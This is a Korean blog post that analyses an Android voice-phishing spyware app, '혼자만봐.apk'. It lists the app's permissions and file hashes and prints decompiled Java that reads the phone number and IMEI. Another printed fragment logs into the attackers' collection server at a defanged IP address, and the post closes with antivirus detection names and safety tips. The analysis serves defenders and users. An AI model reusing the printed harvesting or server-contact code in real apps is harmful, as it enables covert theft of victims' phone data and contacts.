꿈을꾸는 파랑새

오늘은 보이스피싱 악성코드인 혼자만봐.apk(2021.03.31)에 대해 글을 적어 보겠습니다. 물론 현명한 분이라면 기본적으로 백신앱(인지도 있는 제품)하고 있는 상태에서 실시간 감시 등을 하는 상태이거나 또는 안드로이드 스마트폰은 기본적으로 외부에서 다운로드 되는 앱 을 설치를 하면 기본적으로 악성코드에 감염되어서 개인정보가 노출될 수가 있다고 경고를 하고 있습니다.
즉 사용자가 외부인 공식 스토어가 아닌 곳에서 다운로드 한 곳은 위험하다고 생각을 하시면 될 것입니다. 일단 해당 악성코드는 악성코드 이름은 다음과 같습니다.
app_name: 사진
package_name: com.uniapp.unidghre902
그리고 악성코드 권한은 다음과 같습니다.
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.INTERNET
android.permission.READ_PHONE_STATE
android.permission.READ_CONTACTS
android.permission.READ_SMS

혼자만봐.apk 악성코드 권한

이번 몸캠 악성코드는 일단 권한은 6개로 간단하게 구성이 돼 있는 걸을 확인을 할 수가 있습니다. 그리고 해쉬값은 다음과 같습니다.
파일명: 혼자만봐.apk
크기: 1,347,549 Bytes
C RC32: dc2e4637
MD5:f8976f1c57731b621f43a1c1578f20b6
SHA-1:41836122beae80ea8993df0fea449efdc32fb329
SHA-256:1e4ac37ed8c7b704ae0ac57e1a8b29728fecddb360e84b8e8353e2876202d3ef
입니다.

com.zhongwenmingzi.xuexi.a.e

com.zhongwenmingzi.xuexi.a.e에서는 스마트폰의 IMEI 정보를 훔쳐가기 위한 코드가 있는 것을 볼 수가 있습니다.

public class e {
    public static final String a() {
        return Build.MODEL + "," + Build.VERSION.RELEASE + "," + Build.VERSION.SDK;
    }

    public static final String a(Context context) {
        String line1Number = ((TelephonyManager) context.getSystemService("phone")).getLine1Number();
        if (TextUtils.isEmpty(line1Number)) {
            line1Number = c.c(context);
        }
        return a(line1Number);
    }

    public static final String a(String str) {
        return !TextUtils.isEmpty(str) ? Pattern.compile("[^\\d]").matcher(str).replaceAll("").trim() : str;
    }

    public static final String b(Context context) {
        String deviceId = ((TelephonyManager) context.getSystemService("phone")).getDeviceId();
        return TextUtils.isEmpty(deviceId) ? c.d(context) : deviceId;
    }
}

그리고 com.zhongwenmingzi.xuexi.d에서는 다음과 같이 해당 보이스 피싱 을 당한 사람들의 개인정보를 수집하기 위해서 간단하게 아이디, 비밀번호가 삽입된 것을 볼 수가 있습니다.

com.zhongwenmingzi.xuexi.d

public static String a(Context context) {
        String str = null;
        StringBuffer stringBuffer = new StringBuffer();
        try {
            HttpURLConnection httpURLConnection = (HttpURLConnection) new URL("hxxp://107(.)191.61.74:8080/m/login.htm").openConnection();
            httpURLConnection.setRequestMethod("POST");
            httpURLConnection.setConnectTimeout(3000);
            httpURLConnection.setDoOutput(true);
            httpURLConnection.getOutputStream().write("username=?????&password=??????".getBytes());
            httpURLConnection.setInstanceFollowRedirects(false);
            httpURLConnection.connect();
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream(), "UTF-8"));
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                }
                stringBuffer.append(readLine);
                stringBuffer.append("\r\n");
            }
            bufferedReader.close();
            List<String> list = (List) httpURLConnection.getHeaderFields().get("Set-Cookie");
            if (list == null || list.size() <= 0) {
                return null;
            }
            String str2 = "";
            for (String str3 : list) {
                if (str3.contains("JSESSIONID")) {

해당 사이트에 로그인하면 해당 악성코드에 당한 사람들의 휴대폰 정보가 나오면 해당 번호를 클릭하면 해당 스마트폰에 저장된 연락처들이 보이는 것을 확인할 수가 있습니다.

악성코드 개인정보 수집 사이트


일단 개인적인 생각으로는 기본적으로 연락처들을 가져가서 보이스피싱에 이용을 하는 것으로 추측할 수가 있으며 일단 기본적으로 AhnLab-V3: Trojan/Android.SMSstealer.993516, Avast-Mobile:Android:Evo-gen [Trj],McAfee:Artemis!F8976F1C5773, ESET-NOD32:A Variant Of Android/Spy.Vmvol.I, Symantec Mobile Insight:Spyware:MobileSpy등에서는 사전 방역 또는 정식 탐지명으로 악성코드가 탐지되고 있으므로 안드로이드 사용자 분들은 백신앱을 제대로 된 제품을 사용하고 기본적인 보안 수칙을 지키는 것이 안전하게 스마트폰을 사용하는 방법일 것입니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band